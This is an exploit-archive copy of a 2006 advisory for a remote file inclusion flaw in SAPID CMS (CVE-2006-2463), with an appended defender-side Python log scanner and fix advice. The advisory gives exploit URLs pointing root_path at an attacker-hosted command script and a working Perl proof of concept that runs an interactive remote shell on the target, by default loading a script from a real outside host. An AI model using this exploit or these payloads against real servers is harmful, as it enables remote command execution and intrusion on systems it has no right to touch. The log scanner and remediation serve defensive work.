SAPID CMS remote File Inclusion vulnerabilities
CVE: CVE-2006-2463
Category: CWE-98
Price: Not specified
Severity: High
Author: RoMaNcYxHaCkEr
Risk: High
Exploitation Type: Remote
Date: 2006-08-15
CPE: cpe:cpe:/a:sapid_cms:all_versions
PURL: pkg:pkg:exploitalert/sapid-cms-remote-file-inclusion-vulnerabilities
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080055
Below is a copy:
########################################################################
#
# Title: SAPID CMS remote File Inclusion Vulnerabilities
#
# Author: Simo64 <simo64_at_morx_org>
#
# Discovered: 06 August 2006
#
# MorX Security Research Team
#
# http://www.morx.org
#
# Vendor : SAPID CMS
#
# Version : 123 rc3
#
# Website : http://sapid.sourceforge.net
#
# Severity: Critical
#
# Details:
#
#
# [+] Remote File Inclusion
#
# 1) vulnerable code in usr/extensions/get_infochannel.inc.php lines( 8 - 9 )
#
# if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");
# include($root_path."usr/system/common_extfunctions.inc.php"); }
#
# 2) vulnerable code in usr/extensions/get_tree.inc.php lines( 9 - 10 )
#
# if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");
# include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php"); }
#
# The $root_path and $GLOBALS["root_path"] variables are not sanitized before they are used to include files
#
# [-] Exploit :
#
# http://localhost/usr/extensions/get_infochannel.inc.php?root_path=http://attacker/cmd.txt?cmd=id;pwd
#
# http://localhost/usr/extensions/get_tree.inc.php?GLOBALS["root_path"]=http://attacker/cmd.txt?cmd=id;pwd
#
#======================================
# Poc Remote Command Execution Exploit:
#======================================
#
# http://www.morx.org/sapid.txt
#
# C:>perl sapid.pl http://127.0.0.1
#
# ===============================================================
# = SAPID 123_rc3 (rootpath) Remote Command Execution Exploit =
# ===============================================================
# = MorX Security Research Team - www.morx.org =
# = Coded by Simo64 - simo64 (at) www.morx (dot) org =
# ===============================================================
# simo64 (at) morx (dot) org :~$ id; pwd; ls
# uid=48(apache) gid=48(apache) groups=48(apache)
# get_calendar.inc.php
# get_filter_list.inc.php
# get_gb_records.inc.php
# get_infochannelfilter.inc.php
# get_infochannel.inc.php
# get_rss.inc.php
# get_searchresults.inc.php
# get_survey.inc.php
# get_track.inc.php
# get_tree.inc.php
# soap_call.inc.php
# /home/public_html/sapid/usr/extensions
# simo64 (at) morx (dot) org :~$ exit
#
# Enjoy !
#
#!/usr/bin/perl
# PoC script from the advisory. The "\n" escapes, the variable declaration list
# and the while(1) loop were mangled by extraction and are restored here; behaviour is unchanged.
use LWP::Simple;
print "\n===============================================================\n";
print "= SAPID 123_rc3 (rootpath) Remote Command Execution Exploit =\n";
print "===============================================================\n";
print "= MorX Security Research Team - www.morx.org =\n";
print "= Coded by Simo64 - simo64 (at) morx (dot) org =\n";
print "===============================================================\n\n";
my ($targ, $rsh, $path, $con, $cmd, $data, $getit);
$targ = $ARGV[0];
$rsh  = $ARGV[1];
if (!$ARGV[1]) { $rsh = "http://zerostag.free.fr/sh.txt"; }   # default remote script when none is given
if (!@ARGV) { &usage; exit(0); }
chomp($targ);
chomp($rsh);
# vulnerable script (see the details above); the whole CMS path is taken from the first argument
$path = $targ."/usr/extensions/get_infochannel.inc.php";
$con = get($path) || die "[-]Cannot connect to Host";
sub usage() {
    print "Usage : perl $0 host/path [OPTION]\n\n";
    print "Examples : perl $0 http://127.0.0.1\n";
    print "           perl $0 http://127.0.0.1 http://yoursite/yourcmd.txt\n\n";
}
while (1)
{
    print "simo64 (at) morx (dot) org :~\$ ";
    chomp($cmd = <STDIN>);
    if ($cmd eq "exit") { print "\nEnjoy !\n\n"; exit(0); }
    # root_path arrives via the query string (register_globals) and goes straight into include()
    $getit = $path."?root_path=".$rsh."?&cmd=".$cmd;
    $data = get($getit);
    if ($cmd eq "") { print "Please enter command !\n"; }
    else { print $data; }
}
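An added defender-side example, not part of the advisory or of SAPID CMS: a Python scan of web-server access logs for requests that hand a remote URL to the root_path / GLOBALS["root_path"] parameters of the two extension scripts named above. The Apache combined log format, the sample lines and the addresses in them are assumed and constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format is assumed; only the fields used below are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<url>\S+) [^"]*" (?P<status>\d{3})')
# The two scripts and the two variable names called out in the advisory.
RFI_SCRIPTS = ("/usr/extensions/get_infochannel.inc.php", "/usr/extensions/get_tree.inc.php")
RFI_PARAMS = ("root_path", "GLOBALS[root_path]")
# include($root_path . "usr/system/...") fetches remote code when the value starts with a URL
# scheme or a PHP stream wrapper (given allow_url_fopen / allow_url_include permit it).
REMOTE_RE = re.compile(r"^(?:https?|ftps?|php|data|expect)://", re.IGNORECASE)

def parse_line(line):
    """Split one access-log line into ip, timestamp, script path, decoded query params and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": parts.path,
            "params": parse_qsl(parts.query, keep_blank_values=True), "status": int(m.group("status"))}

def rfi_findings(entry):
    """Return (param, value) pairs that would make the vulnerable include() load remote code."""
    if entry is None or not entry["path"].endswith(RFI_SCRIPTS):
        return []
    hits = []
    for name, value in entry["params"]:
        norm = name.replace('"', "").replace("'", "")  # GLOBALS["root_path"] -> GLOBALS[root_path]
        if norm in RFI_PARAMS and REMOTE_RE.match(value):
            hits.append((norm, value))
    return hits

def scan_log(text):
    """Scan a whole log; one finding dict per (line, parameter) pair, in log order."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        for name, value in rfi_findings(entry):
            findings.append({"ip": entry["ip"], "ts": entry["ts"], "script": entry["path"],
                             "param": name, "value": value, "status": entry["status"]})
    return findings

# Constructed sample lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Aug/2006:10:12:01 +0000] "GET /sapid/usr/extensions/get_infochannel.inc.php?root_path=http://198.51.100.9/cmd.txt?&cmd=id HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.7 - - [15/Aug/2006:10:12:05 +0000] "GET /sapid/usr/extensions/get_tree.inc.php?GLOBALS%5B%22root_path%22%5D=http%3A%2F%2F198.51.100.9%2Fcmd.txt HTTP/1.1" 200 480 "-" "libwww-perl/5.805"
192.0.2.20 - - [15/Aug/2006:10:13:00 +0000] "GET /sapid/index.php?id=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.21 - - [15/Aug/2006:10:14:00 +0000] "GET /sapid/usr/extensions/get_tree.inc.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""
```

With register_globals the same variable can also arrive in a POST body or a cookie, which an access log does not record, so an empty result is not proof of absence. The real fix is on the application side: set $root_path from configuration instead of accepting it from the request, and disable register_globals and allow_url_include.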
Copyright ©2024 Exploitalert.